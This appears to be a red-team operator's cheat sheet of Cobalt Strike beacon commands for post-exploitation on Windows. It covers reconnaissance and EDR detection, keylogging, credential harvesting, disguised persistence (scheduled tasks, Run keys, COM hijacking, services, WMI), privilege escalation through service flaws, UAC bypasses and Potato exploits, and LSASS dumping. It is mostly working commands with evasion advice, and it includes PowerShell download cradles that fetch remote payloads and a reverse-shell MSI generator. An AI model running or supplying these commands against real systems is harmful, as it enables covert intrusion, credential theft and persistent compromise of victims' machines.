Host Reconnaissance & Persistence#
Host Reconnaissance#
Process and System Enumeration#
Usage: Gather comprehensive information about the compromised system.
# Identify running processes with detailed info
beacon> ps
# Filter for security products (AV/EDR/XDR)
beacon> shell tasklist /svc | findstr /i "defender crowdstrike cylance sentinel carbonblack symantec mcafee kaspersky sophos trellix"
# Modern EDR detection via process names
beacon> powerpick Get-Process | Where-Object {$_.ProcessName -match "sense|msmpeng|mssense|windefend|csagent|csfalcon|cb|tanium|elastic"} | select ProcessName,Id,Path | ft -AutoSize
# Check for EDR drivers (kernel-level detection)
beacon> shell fltmc | findstr /i "SysmonDrv CrowdStrike CarbonBlack CyOptics CyProtect Tanium"
# Alternative: Use BOF for silent enumeration
beacon> inline-execute /opt/bofs/enum_edr.o
# System enumeration with Seatbelt (comprehensive)
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system
# Targeted Seatbelt checks
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe OSInfo,LocalUsers,LocalGroups,NetworkShares,AuditPolicies,PowerShell,DotNet
# Modern: Check for Windows Defender ATP/MDE
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsDefender
# Check for Sysmon installation
beacon> shell reg query HKLM\SYSTEM\CurrentControlSet\Services\SysmonDrv
beacon> powerpick Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'} -MaxEvents 1 -ErrorAction SilentlyContinue
# Identify logged-in users and sessions
beacon> net logons
beacon> shell query user
beacon> shell qwinsta
# User activity monitoring
beacon> screenshot
beacon> screenwatch # Continuous screenshots (OPSEC risk)
beacon> clipboard # Capture clipboard contents
# Keylogger operations (HIGH OPSEC RISK)
beacon> keylogger <pid> # Inject into specific process
beacon> jobs # List active jobs
beacon> jobkill <job_id> # Stop keylogger
# Network enumeration
beacon> shell ipconfig /all
beacon> shell route print
beacon> shell arp -a
beacon> shell netstat -ano
# Check for network monitoring tools
beacon> powerpick Get-NetTCPConnection | Where-Object {$_.State -eq "Listen"} | select LocalAddress,LocalPort,OwningProcess | ft -AutoSize
# Domain enumeration (if domain-joined)
beacon> shell nltest /domain_trusts
beacon> shell nltest /dclist:
beacon> powerpick Get-WmiObject -Class Win32_ComputerSystem | select Domain,DomainRole
# Software inventory
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe InstalledProducts
# Check for virtualization/sandbox
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe CloudCredentials,Docker
# OPSEC: Minimize noisy enumeration commands
# Use BOFs instead of execute-assembly when possible (smaller memory footprint)
Advanced Host Enumeration with BOFs#
Usage: Use Beacon Object Files for stealthy enumeration.
# BOF advantages: No .NET assembly loading, smaller memory footprint, less EDR telemetry
# List processes (alternative to ps)
beacon> inline-execute /opt/bofs/enumprocess.o
# Enumerate local administrators
beacon> inline-execute /opt/bofs/localadmin.o
# Check AV/EDR products
beacon> inline-execute /opt/bofs/check_edr.o
# Enumerate logged-on users
beacon> inline-execute /opt/bofs/enum_loggedon.o
# Network connections
beacon> inline-execute /opt/bofs/netstat.o
# Registry queries (silent)
beacon> inline-execute /opt/bofs/reg_query.o HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# OPSEC: BOFs execute in-beacon process, avoiding process creation telemetry
# Download BOF collection: https://github.com/trustedsec/CS-Situational-Awareness-BOF
Credential Enumeration#
Usage: Identify stored credentials on the compromised host.
# Windows Vault credentials
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault
beacon> shell vaultcmd /list
beacon> shell vaultcmd /listcreds:"Windows Credentials" /all
# Browser credentials (requires user context)
beacon> execute-assembly C:\Tools\SharpChrome\SharpChrome\bin\Release\SharpChrome.exe logins
beacon> execute-assembly C:\Tools\SharpEdge\SharpEdge.exe
# Saved RDP connections
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe RDPSessions
beacon> powerpick Get-ItemProperty "HKCU:\Software\Microsoft\Terminal Server Client\Servers\*" | select PSChildName
# WiFi passwords
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WifiProfile
beacon> shell netsh wlan show profiles
beacon> shell netsh wlan show profile name="WiFi-Name" key=clear
# Credential files on disk
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles
# Check for stored credentials in common locations
beacon> powerpick Get-ChildItem -Path "C:\Users\*\AppData\Local\Microsoft\Credentials" -Recurse -ErrorAction SilentlyContinue | select FullName
Host Persistence#
Payload Encoding for Persistence#
Usage: Encode payloads to bypass command-line logging and EDR monitoring.
# PowerShell encoding (UTF-16LE required)
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/stage1"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
# Linux encoding method
$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/beacon.ps1')" | iconv -t UTF-16LE | base64 -w 0
# Execute encoded payload
powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <BASE64>
# Alternative: Use XOR encoding for better evasion
PS C:\> $bytes = [System.Text.Encoding]::UTF8.GetBytes($str)
PS C:\> $key = 0x42
PS C:\> $encoded = $bytes | ForEach-Object { $_ -bxor $key }
PS C:\> [Convert]::ToBase64String($encoded)
# Modern: Use environment variables for payload staging
beacon> shell setx CHROME_UPDATE "<base64_payload>" /M
beacon> powerpick $payload = [System.Environment]::GetEnvironmentVariable("CHROME_UPDATE","Machine"); IEX([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)))
# OPSEC: Command-line arguments are logged by Sysmon EventID 1
# Better approach: Use stageless payloads or file-based execution
User-Level Persistence#
Scheduled Task Persistence#
Usage: Create scheduled tasks for persistence (user context).
# Method 1: Using SharPersist (recommended)
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-NoP -W Hidden -Enc <BASE64>" -n "GoogleUpdateTaskMachineCore" -m add -o hourly
# Method 2: Direct schtasks command
beacon> shell schtasks /create /tn "MicrosoftEdgeUpdateTaskUser" /tr "powershell.exe -NoP -W Hidden -Enc <BASE64>" /sc daily /st 09:00 /f
# Method 3: Using COM objects (stealthier)
beacon> powerpick $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoP -W Hidden -Enc <BASE64>"; $trigger = New-ScheduledTaskTrigger -AtLogOn; Register-ScheduledTask -TaskName "MicrosoftOfficeUpdateTask" -Action $action -Trigger $trigger -Force
# Advanced: XML-based task creation (more control)
beacon> upload C:\Payloads\task.xml
beacon> shell schtasks /create /tn "WindowsDefenderUpdate" /xml C:\Payloads\task.xml /f
# OPSEC considerations:
# - Use legitimate-sounding task names (e.g., "GoogleUpdate", "AdobeARMservice")
# - Set realistic execution times (business hours)
# - Use /RU "SYSTEM" for elevated tasks (requires admin)
# - Hide task: schtasks /change /tn "TaskName" /RU "SYSTEM" /RL HIGHEST
# List existing tasks for OPSEC blending
beacon> shell schtasks /query /fo LIST /v | findstr /i "Task"
# Remove persistence
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -n "GoogleUpdateTaskMachineCore" -m remove
Startup Folder Persistence#
Usage: Place persistence in user’s startup folder.
# Method 1: Using SharPersist
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-NoP -W Hidden -Enc <BASE64>" -f "OneDriveSetup" -m add
# Method 2: Direct file copy
beacon> cd C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\legitimate.lnk
beacon> shell attrib +h "C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\legitimate.lnk"
# Method 3: VBS script in startup
beacon> shell echo "CreateObject(""WScript.Shell"").Run ""powershell -NoP -W Hidden -Enc <BASE64>"", 0" > C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs
# OPSEC: Startup folder is heavily monitored
# Better alternatives: Registry Run keys, COM hijacking, or services
Registry Run Key Persistence#
Usage: Use registry autorun keys for persistence.
# Method 1: Using SharPersist
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Microsoft\Windows\UpdateService.exe" -a "/quiet /norestart" -k "hkcurun" -v "MicrosoftEdgeUpdate" -m add
# Upload payload first
beacon> cd C:\ProgramData\Microsoft\Windows
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe UpdateService.exe
beacon> shell attrib +h C:\ProgramData\Microsoft\Windows\UpdateService.exe
# Method 2: Direct registry modification
beacon> shell reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "GoogleChromeUpdate" /t REG_SZ /d "C:\ProgramData\Google\Update\GoogleUpdate.exe" /f
# Method 3: Using PowerShell
beacon> powerpick New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDriveSetup" -Value "C:\ProgramData\OneDrive\OneDriveSetup.exe" -PropertyType String -Force
# Common registry locations for persistence:
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run (requires admin)
# HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce (requires admin)
# HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows (Userinit)
# Advanced: RunOnceEx key (less monitored)
beacon> shell reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v "1" /t REG_SZ /d "C:\ProgramData\Update\svchost.exe" /f
# OPSEC: Query existing Run keys to blend in
beacon> shell reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
# Remove persistence
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -k "hkcurun" -v "MicrosoftEdgeUpdate" -m remove
COM Hijacking Persistence#
Usage: Hijack COM objects for DLL-based persistence (stealthier).
# Identify hijackable COM objects
beacon> powerpick Get-ChildItem "HKCU:\Software\Classes\CLSID" -Recurse | Get-ItemProperty -Name "(Default)" -ErrorAction SilentlyContinue | Where-Object {$_."(Default)" -ne $null}
# Hijack common COM object (e.g., {BCDE0395-E52F-467C-8E3D-C4579291692E} - MMDeviceEnumerator)
beacon> shell reg add "HKCU\Software\Classes\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}\InprocServer32" /ve /t REG_SZ /d "C:\ProgramData\AudioService\audiodg.dll" /f
beacon> shell reg add "HKCU\Software\Classes\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}\InprocServer32" /v ThreadingModel /t REG_SZ /d "Apartment" /f
# Upload malicious DLL
beacon> cd C:\ProgramData\AudioService
beacon> upload C:\Payloads\http_x64.dll
beacon> mv http_x64.dll audiodg.dll
# Trigger COM object (test)
beacon> powerpick [System.Runtime.InteropServices.Marshal]::GetTypeFromCLSID("{BCDE0395-E52F-467C-8E3D-C4579291692E}")
# OPSEC: COM hijacking is very stealthy but requires careful DLL development
# DLL must implement proper COM interfaces or will crash applications
Elevated/System-Level Persistence#
Windows Service Persistence#
Usage: Create Windows service for SYSTEM-level persistence (requires admin).
# Method 1: Using SharPersist
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\System32\WindowsDefender\SecurityHealthSystray.exe" -n "SecurityHealthService" -m add
# Upload service binary first
beacon> cd C:\Windows\System32\WindowsDefender
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe SecurityHealthSystray.exe
# Method 2: Direct sc command
beacon> shell sc create "WindowsUpdateService" binPath= "C:\Windows\System32\WindowsUpdate\WUDFHost.exe" start= auto DisplayName= "Windows Update Service"
beacon> shell sc description "WindowsUpdateService" "Manages Windows Update operations"
beacon> shell sc start "WindowsUpdateService"
# Method 3: Using PowerShell
beacon> powerpick New-Service -Name "MicrosoftDefenderService" -BinaryPathName "C:\Windows\System32\DefenderService\MsMpEng.exe" -StartupType Automatic -DisplayName "Microsoft Defender Antimalware Service"
# Configure service for SYSTEM execution
beacon> shell sc config "WindowsUpdateService" obj= "LocalSystem" password= ""
# Set service to restart on failure (persistence after reboot)
beacon> shell sc failure "WindowsUpdateService" reset= 86400 actions= restart/60000/restart/60000/restart/60000
# OPSEC considerations:
# - Use legitimate service names (query existing services first)
# - Set appropriate service type: sc config <service> type= own
# - Configure service dependencies to appear legitimate
# - Service binaries must be proper Windows services (not regular EXEs)
# Query existing services for naming ideas
beacon> shell sc query type= service state= all | findstr /i "SERVICE_NAME DISPLAY_NAME"
# Remove persistence
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -n "SecurityHealthService" -m remove
WMI Event Subscription Persistence#
Usage: Use WMI event subscriptions for fileless persistence.
# Method 1: Using PowerLurk
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powerpick Register-MaliciousWmiEvent -EventName "WindowsUpdateCheck" -PermanentCommand "C:\Windows\System32\svchost.exe" -Trigger ProcessStart -ProcessName notepad.exe
# Method 2: Manual WMI subscription (more control)
beacon> powerpick $EventFilter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name="SystemBootFilter";EventNamespace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}
beacon> powerpick $Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name="WindowsUpdateConsumer";CommandLineTemplate="powershell.exe -NoP -W Hidden -Enc <BASE64>"}
beacon> powerpick $Binding = Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$EventFilter;Consumer=$Consumer}
# Method 3: Trigger on user logon
beacon> powerpick $Filter = Set-WmiInstance -Class __EventFilter -Namespace root\subscription -Arguments @{Name="UserLogonFilter";EventNamespace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType=2"}
# List existing WMI subscriptions (reconnaissance)
beacon> powerpick Get-WmiObject -Namespace root\subscription -Class __EventFilter
beacon> powerpick Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer
# Remove WMI persistence
beacon> powerpick Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='WindowsUpdateCheck'" | Remove-WmiObject
beacon> powerpick Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='WindowsUpdateConsumer'" | Remove-WmiObject
beacon> powerpick Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding | Where-Object {$_.Filter -match "WindowsUpdateCheck"} | Remove-WmiObject
# OPSEC: WMI persistence is powerful but generates telemetry
# Monitored by: Sysmon EventID 19-21, Windows Event 5861
# Better for long-term access on mature targets
DLL Hijacking Persistence#
Usage: Hijack DLL search order for persistence.
# Identify DLL hijacking opportunities
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit HijackableDLLs
# Common hijackable DLLs:
# - profapi.dll (loaded by userinit.exe)
# - ntshrui.dll (loaded by explorer.exe)
# - wlbsctrl.dll (loaded by various services)
# Example: Hijack missing DLL in System32
beacon> cd C:\Windows\System32
beacon> upload C:\Payloads\hijack_x64.dll
beacon> mv hijack_x64.dll profapi.dll
# DLL Proxying (forward legitimate calls)
# Generate proxy DLL using SharpDLLProxy
beacon> execute-assembly C:\Tools\SharpDLLProxy\SharpDLLProxy.exe --dll C:\Windows\System32\uxtheme.dll --payload C:\Payloads\beacon.bin
# OPSEC: Ensure DLL exports match original to avoid crashes
# Use DLL export forwarding for legitimate functionality
Print Processor Persistence#
Usage: Install malicious print processor (SYSTEM persistence).
# Upload malicious print processor DLL
beacon> cd C:\Windows\System32\spool\prtprocs\x64
beacon> upload C:\Payloads\print_processor_x64.dll
beacon> mv print_processor_x64.dll malicious.dll
# Add print processor
beacon> shell reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\malicious" /v Driver /t REG_SZ /d "malicious.dll" /f
# Trigger by adding printer
beacon> powerpick Add-Printer -Name "NetworkPrinter" -DriverName "Generic / Text Only" -PortName "LPT1:"
# OPSEC: Rarely monitored, requires admin, executes as SYSTEM
# Difficult to detect without file integrity monitoring
Privilege Escalation & Credential Theft#
Privilege Escalation#
Service Enumeration#
Usage: Identify vulnerable Windows services for privilege escalation.
# Comprehensive service enumeration with SharpUp
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit
# Targeted service vulnerability checks
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit UnquotedServicePath
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServiceBinaries
# Alternative: PowerUp (PowerShell-based)
beacon> powershell-import C:\Tools\PowerSploit\Privesc\PowerUp.ps1
beacon> powerpick Invoke-AllChecks
# Manual service enumeration
beacon> shell sc query state= all
beacon> shell wmic service get name,pathname,displayname,startmode | findstr /i "auto"
beacon> powerpick Get-Service | Where-Object {$_.Status -eq "Running"} | select Name,DisplayName,StartType | ft -AutoSize
# Detailed service information
beacon> shell sc qc <service_name>
beacon> shell sc sdshow <service_name> # View service permissions
# Check service binary permissions
beacon> powerpick Get-Acl -Path "C:\Program Files\VulnerableApp\service.exe" | fl
beacon> shell icacls "C:\Program Files\VulnerableApp\service.exe"
# Service management
beacon> shell sc stop <service_name>
beacon> shell sc start <service_name>
beacon> shell sc config <service_name> start= demand
# OPSEC: Service manipulation creates Event ID 7040 (state change)
# Use during maintenance windows or disguise as legitimate admin activity
CASE 1: Unquoted Service Path Exploitation#
Usage: Exploit unquoted service paths with spaces to execute malicious binaries.
# 1. Identify vulnerable services
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit UnquotedServicePath
# Example vulnerable path: C:\Program Files\Vulnerable Services\Service Folder\service.exe
# Windows will search in order:
# C:\Program.exe
# C:\Program Files\Vulnerable.exe
# C:\Program Files\Vulnerable Services\Service.exe
# 2. Check directory write permissions
beacon> powerpick Get-Acl -Path "C:\Program Files\Vulnerable Services" | select -ExpandProperty Access
beacon> shell icacls "C:\Program Files\Vulnerable Services"
# 3. Verify we can write to the directory
beacon> shell echo test > "C:\Program Files\Vulnerable Services\test.txt"
beacon> shell del "C:\Program Files\Vulnerable Services\test.txt"
# 4. Upload malicious service binary
beacon> cd "C:\Program Files\Vulnerable Services"
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe Service.exe
# OPSEC: Match file metadata to blend in
beacon> shell powershell -c "(Get-Item 'C:\Program Files\Vulnerable Services\legitimate.exe').CreationTime = '01/01/2020 12:00:00'"
beacon> shell powershell -c "(Get-Item 'C:\Program Files\Vulnerable Services\Service.exe').CreationTime = '01/01/2020 12:00:00'"
# 5. Restart service to trigger execution
beacon> shell sc stop VulnerableService
beacon> shell sc start VulnerableService
# 6. Connect to elevated beacon (if using tcp-local listener)
beacon> connect localhost 4444
# Alternative: Use PowerShell for quieter restart
beacon> powerpick Restart-Service -Name "VulnerableService" -Force
# Cleanup: Remove malicious binary after getting elevated session
beacon> shell del "C:\Program Files\Vulnerable Services\Service.exe"
CASE 2: Weak Service Permissions Exploitation#
Usage: Modify service configuration to point to malicious binary.
# 1. Identify services with weak permissions
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices
# 2. Check service ACL (Access Control List)
beacon> powershell-import C:\Tools\Get-ServiceAcl.ps1
beacon> powerpick Get-ServiceAcl -Name VulnerableService | select -ExpandProperty Access
# Look for: ChangeConfig, AllAccess, GenericWrite, WriteDacl permissions
# 3. Verify current service configuration
beacon> shell sc qc VulnerableService
# 4. Prepare malicious binary in accessible location
beacon> mkdir C:\ProgramData\Update
beacon> cd C:\ProgramData\Update
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe UpdateService.exe
# OPSEC: Hide directory and file
beacon> shell attrib +h C:\ProgramData\Update
beacon> shell attrib +h C:\ProgramData\Update\UpdateService.exe
# 5. Modify service binary path
beacon> shell sc config VulnerableService binPath= "C:\ProgramData\Update\UpdateService.exe"
# Optional: Change service to start automatically
beacon> shell sc config VulnerableService start= auto
# 6. Verify configuration change
beacon> shell sc qc VulnerableService
# 7. Restart service
beacon> shell sc stop VulnerableService
beacon> shell sc start VulnerableService
# 8. Connect to elevated beacon
beacon> connect localhost 4444
# Alternative: Modify service to run command then restore
beacon> shell sc config VulnerableService binPath= "cmd.exe /c powershell -NoP -W Hidden -Enc <BASE64>"
beacon> shell sc start VulnerableService
# After execution, restore original path
beacon> shell sc config VulnerableService binPath= "C:\Program Files\Original\service.exe"
# Cleanup: Restore service configuration
beacon> shell sc config VulnerableService binPath= "C:\Program Files\Vulnerable Services\original.exe"
beacon> shell del C:\ProgramData\Update\UpdateService.exe
CASE 3: Weak Service Binary Permissions Exploitation#
Usage: Overwrite service binary with malicious executable.
# 1. Identify vulnerable service binaries
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServiceBinaries
# 2. Check binary file permissions
beacon> powerpick Get-Acl -Path "C:\Program Files\Vulnerable App\service.exe" | select -ExpandProperty Access
beacon> shell icacls "C:\Program Files\Vulnerable App\service.exe"
# Look for: BUILTIN\Users:(F) or (M) - Full control or Modify
# 3. Backup original binary (optional, for cleanup)
beacon> shell copy "C:\Program Files\Vulnerable App\service.exe" "C:\Program Files\Vulnerable App\service.exe.bak"
# 4. Stop service
beacon> shell sc stop VulnerableService
# 5. Replace binary with malicious service executable
PS C:\Payloads> copy tcp-local_x64.svc.exe service.exe
beacon> cd "C:\Program Files\Vulnerable App"
beacon> upload C:\Payloads\service.exe
# OPSEC: Match original file timestamps and metadata
beacon> powerpick $original = Get-Item "C:\Program Files\Vulnerable App\service.exe.bak"; $new = Get-Item "C:\Program Files\Vulnerable App\service.exe"; $new.CreationTime = $original.CreationTime; $new.LastWriteTime = $original.LastWriteTime; $new.LastAccessTime = $original.LastAccessTime
# 6. Start service
beacon> shell sc start VulnerableService
# 7. Connect to elevated beacon
beacon> connect localhost 4444
# Cleanup: Restore original binary
beacon> shell sc stop VulnerableService
beacon> shell copy "C:\Program Files\Vulnerable App\service.exe.bak" "C:\Program Files\Vulnerable App\service.exe"
beacon> shell del "C:\Program Files\Vulnerable App\service.exe.bak"
beacon> shell sc start VulnerableService
UAC Bypass Techniques#
Usage: Bypass User Account Control to elevate from admin to high integrity.
# Check current integrity level
beacon> shell whoami /groups | findstr /i "label"
# Verify user is in Administrators group
beacon> shell net localgroup administrators
# Method 1: Cobalt Strike built-in UAC bypass (scheduled task method)
beacon> elevate uac-schtasks tcp-local
# Method 2: UAC bypass using Token Duplication (CS 4.5+)
beacon> elevate uac-token-duplication tcp-local
# Method 3: COM Elevation Moniker (Windows 10/11)
beacon> elevate uac-cmstplua tcp-local
# Method 4: Fodhelper UAC bypass (registry-based)
beacon> shell reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /t REG_SZ /d "C:\Windows\System32\cmd.exe /c powershell -NoP -W Hidden -Enc <BASE64>" /f
beacon> shell reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /f
beacon> shell fodhelper.exe
# Cleanup
beacon> shell reg delete "HKCU\Software\Classes\ms-settings" /f
# Method 5: CMSTP UAC bypass (INF file method)
beacon> upload C:\Payloads\bypass.inf
beacon> shell cmstp.exe /s C:\Payloads\bypass.inf
# Method 6: Manual UAC bypass using DiskCleanup (cleanmgr.exe)
beacon> shell reg add "HKCU\Environment" /v windir /t REG_SZ /d "cmd.exe /c powershell -NoP -W Hidden -Enc <BASE64> && " /f
beacon> shell schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
# Cleanup
beacon> shell reg delete "HKCU\Environment" /v windir /f
# Method 7: Using Akagi tool (multiple UAC bypass methods)
beacon> execute-assembly C:\Tools\Akagi\Akagi64.exe 61 C:\Payloads\beacon.exe
# Verify elevated beacon connection
beacon> connect localhost 4444
# Check new beacon integrity level
beacon> shell whoami /groups | findstr /i "high"
# OPSEC Considerations:
# - UAC bypasses create suspicious registry keys and scheduled tasks
# - Monitor for Event ID 4688 (process creation) with elevated tokens
# - Some methods only work on specific Windows versions
# - Test bypasses on target OS version before live use
Token Privilege Escalation#
Usage: Abuse enabled token privileges for privilege escalation.
# Check current token privileges
beacon> shell whoami /priv
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges
# SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege exploitation
# Common in service accounts (IIS, MSSQL, etc.)
# Method 1: SweetPotato (works on Windows 10/11/Server 2019/2022)
beacon> execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-NoP -W Hidden -Enc <BASE64>"
# Method 2: GodPotato (latest, works on Windows Server 2012-2022)
beacon> execute-assembly C:\Tools\GodPotato\GodPotato.exe -cmd "powershell -NoP -W Hidden -Enc <BASE64>"
# Method 3: PrintSpoofer (works on Windows 10/Server 2016-2019)
beacon> execute-assembly C:\Tools\PrintSpoofer\PrintSpoofer.exe -c "powershell -NoP -W Hidden -Enc <BASE64>"
# Method 4: RoguePotato (requires CLSID and listener)
beacon> execute-assembly C:\Tools\RoguePotato\RoguePotato.exe -r 10.10.10.100 -l 9999 -e "powershell -NoP -W Hidden -Enc <BASE64>"
# SeBackupPrivilege exploitation (backup operators)
# Extract SAM/SYSTEM hives
beacon> shell reg save HKLM\SAM C:\Windows\Temp\sam.hive
beacon> shell reg save HKLM\SYSTEM C:\Windows\Temp\system.hive
beacon> download C:\Windows\Temp\sam.hive
beacon> download C:\Windows\Temp\system.hive
# SeRestorePrivilege exploitation
# Write to protected directories or modify service binaries
# SeDebugPrivilege exploitation
# Inject into SYSTEM processes
beacon> inject <system_process_pid> x64 tcp-local
# SeTakeOwnershipPrivilege exploitation
beacon> shell takeown /f "C:\Windows\System32\utilman.exe"
beacon> shell icacls "C:\Windows\System32\utilman.exe" /grant %username%:F
AlwaysInstallElevated Exploitation#
Usage: Abuse Windows Installer privilege escalation.
# Check if AlwaysInstallElevated is enabled
beacon> shell reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
beacon> shell reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both return 0x1, create malicious MSI
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.100 LPORT=443 -f msi -o installer.msi
# Upload and execute MSI
beacon> upload C:\Payloads\installer.msi
beacon> shell msiexec /quiet /qn /i C:\Payloads\installer.msi
# Alternative: Use WiX Toolset to create custom MSI with beacon payload
Credential Theft#
Special Beacon Command Prefixes#
Usage: Execute commands in different security contexts.
!- Run command in elevated context (SYSTEM if beacon has SYSTEM privileges)@- Impersonate beacon’s thread token (use after steal_token)
# Example: Dump credentials with SYSTEM privileges
beacon> mimikatz !lsadump::sam
# Example: Run command with impersonated token
beacon> steal_token 1234
beacon> @shell whoami
beacon> rev2self
Local Credential Dumping#
LSASS Memory Dumping#
Usage: Extract credentials from LSASS process memory.
# Method 1: Cobalt Strike built-in (uses Mimikatz)
beacon> logonpasswords
# Method 2: Mimikatz sekurlsa module
beacon> mimikatz !sekurlsa::logonpasswords
# Method 3: Dump LSASS with Task Manager (manual)
# Right-click lsass.exe > Create Dump File
# Method 4: ProcDump (Microsoft Sysinternals)
beacon> shell C:\Tools\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
beacon> download C:\Windows\Temp\lsass.dmp
# Parse offline: mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords"
# Method 5: Comsvcs.dll method (native Windows, stealthy)
beacon> shell tasklist /fi "imagename eq lsass.exe"
beacon> shell rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass_pid> C:\Windows\Temp\lsass.dmp full
beacon> download C:\Windows\Temp\lsass.dmp
# Method 6: Nanodump BOF (OPSEC-friendly, no disk writes)
beacon> inline-execute /opt/bofs/nanodump.o --write C:\Windows\Temp\lsass.dmp
# Method 7: Direct syscalls with SafetyDump
beacon> execute-assembly C:\Tools\SafetyDump\SafetyDump.exe
# Method 8: Process forking (PPLBlade for protected LSASS)
beacon> execute-assembly C:\Tools\PPLBlade\PPLBlade.exe --mode dump --pid <lsass_pid>
# OPSEC Considerations:
# - LSASS access triggers Sysmon Event ID 10 (process access)
# - Defender flags direct LSASS memory reads
# - Use comsvcs.dll or remote techniques for better evasion
# - Consider dumping other processes with cached credentials
# Cleanup
beacon> shell del C:\Windows\Temp\lsass.dmp
